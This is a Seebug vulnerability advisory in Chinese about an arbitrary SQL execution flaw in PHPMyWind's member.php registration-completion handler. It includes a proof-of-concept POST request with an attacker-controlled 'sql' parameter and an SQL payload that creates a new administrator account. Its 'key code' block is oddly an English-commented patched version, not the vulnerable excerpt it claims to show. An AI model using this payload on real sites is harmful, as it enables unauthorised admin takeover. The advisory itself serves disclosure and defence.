PHPMyWind一个为所欲为的注入

2015-06-01T00:00:00
ID SSV:94771
Type seebug
Reporter Root
Modified 2015-06-01T00:00:00

Description

简要描述:

如题（rt）。

详细说明:

PHPMyWind 最新版只需普通会员登录，即可执行任意 SQL 语句。漏洞代码位于 /member.php 第 861-941 行：

`` else if($a == 'perfect') { //初始化参数 $username = empty($username) ? '' : $username; $password = empty($password) ? '' : md5(md5($password)); $repassword = empty($repassword) ? '' : md5(md5($repassword)); $email = empty($email) ? '' : $email; //验证输入数据 if($username == '' or $password == '' or $repassword == '' or $email == '') { header('location:?c=perfect'); exit(); } if($password != $repassword) { header('location:?c=perfect'); exit(); } $uname_len = strlen($username); $upwd_len = strlen($_POST['password']); if($uname_len<6 or $uname_len>16 or $upwd_len<6 or $upwd_len>16) { header('location:?c=perfect'); exit(); } if(preg_match("/[^0-9a-zA-Z_@!\.-]/",$username) or preg_match("/[^0-9a-zA-Z_-]/",$password) or !preg_match("/^[\w-]+(\.[\w-]+)*@[\w-]+(\.[\w-]+)+$/", $email)) { header('location:?c=perfect'); exit(); } $r = $dosql->GetOne("SELECTidFROM#@__memberWHEREusername='$username'"); if(isset($r['id'])) { ShowMsg('用户名已存在!','-1'); exit(); } $r = $dosql->GetOne("SELECTidFROM#@__memberWHEREemail`='$email'"); if(isset($r['id'])) { ShowMsg('您填写的邮箱已被注册!','-1'); exit(); } //添加用户数据 $regtime = time(); $regip = GetIP();

if(check_app_login('qq'))
{
    $r = $dosql->GetOne("SELECT `id` FROM `#@__member` WHERE `qqid`='".$_SESSION['app']['qq']['uid']."'");
    if(isset($r['id']))
        ShowMsg('该QQ已与其他账号绑定!','-1');
    else
        $sql = "INSERT INTO `#@__member` (username, password, email, expval, regtime, regip, logintime, loginip, qqid) VALUES ('$username', '$password', '$email', '10', '$regtime', '$regip', '$regtime', '$regip', '".$_SESSION['app']['qq']['uid']."')"; 
}
else if(check_app_login('weibo'))
{
    $r = $dosql->GetOne("SELECT `id` FROM `#@__member` WHERE `qqid`='".$_SESSION['app']['weibo']['idstr']."'");
    if(isset($r['id']))
        ShowMsg('该微博已与其他账号绑定!','-1');
    else
        $sql = "INSERT INTO `#@__member` (username, password, email, expval, regtime, regip, logintime, loginip, weiboid) VALUES ('$username', '$password', '$email', '10', '$regtime', '$regip', '$regtime', '$regip', '".$_SESSION['app']['weibo']['idstr']."')"; 
}

$dosql->ExecNoneQuery($sql);

```

关键代码：

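// Corrected form of the app-binding step in the member.php "perfect" handler.
// $sql is initialised here so that only a statement assembled in this block can
// reach ExecNoneQuery(): in the original, $sql stayed unset whenever neither app
// login was present (or the binding check failed), and the unconditional
// ExecNoneQuery($sql) at the end then ran whatever value $sql already held.
$sql = null;

if (check_app_login('qq')) {
    $qqUid = $_SESSION['app']['qq']['uid'];
    // Identifier quoting restored; the listing above lost the backticks.
    $r = $dosql->GetOne("SELECT `id` FROM `#@__member` WHERE `qqid`='" . $qqUid . "'");
    if (isset($r['id'])) {
        ShowMsg('该QQ已与其他账号绑定!', '-1');
    } else {
        $sql = "INSERT INTO `#@__member` (username, password, email, expval, regtime, regip, logintime, loginip, qqid) VALUES ('$username', '$password', '$email', '10', '$regtime', '$regip', '$regtime', '$regip', '" . $qqUid . "')";
    }
} elseif (check_app_login('weibo')) {
    $weiboId = $_SESSION['app']['weibo']['idstr'];
    // The original compared the Weibo id against `qqid`; the INSERT below writes
    // `weiboid`, so the duplicate-binding check must read that same column or it
    // never matches an existing binding.
    $r = $dosql->GetOne("SELECT `id` FROM `#@__member` WHERE `weiboid`='" . $weiboId . "'");
    if (isset($r['id'])) {
        ShowMsg('该微博已与其他账号绑定!', '-1');
    } else {
        $sql = "INSERT INTO `#@__member` (username, password, email, expval, regtime, regip, logintime, loginip, weiboid) VALUES ('$username', '$password', '$email', '10', '$regtime', '$regip', '$regtime', '$regip', '" . $weiboId . "')";
    }
}

// Execute only a statement built above. $username/$password/$email are still
// interpolated as in the original and rely on the format checks the handler
// performs before this block; the session-supplied app ids are not checked here.
// NOTE(review): what the handler should do when neither app login is present is
// not shown on this page — it simply executes nothing now instead of an
// unset $sql.
if ($sql !== null) {
    $dosql->ExecNoneQuery($sql);
}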

```

$sql 只在 if / else if 两个分支内才会被赋值，只要两个条件都不满足，$sql 就不会被这段代码初始化；
而最后的 $dosql->ExecNoneQuery($sql) 仍会无条件执行，因此可以完全控制所执行的 SQL 语句。

漏洞证明:

利用起来也很简单 注册个用户登录后发个如下的包即可 POST /phpmywind/member.php?a=perfect DATA username=123123123x&password=123123123&repassword=123123123&email=12312@qq.com&sql=xxxxx username email 不是注册过的就行 随便乱填

<img src="https://images.seebug.org/upload/201505/29181857ac9571535f1ec602f50222d151a99eac.jpg" alt="11.jpg" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201505/2918190845405e089dd8a5f0671b19b5a5a3ef4a.jpg" alt="22.jpg" width="600" onerror="javascript:errimg(this);">

sql改成 insert into pmw_admin (username,password) values ((123456),md5(123456)) 即可创建一个 123456 密码123456的管理员账户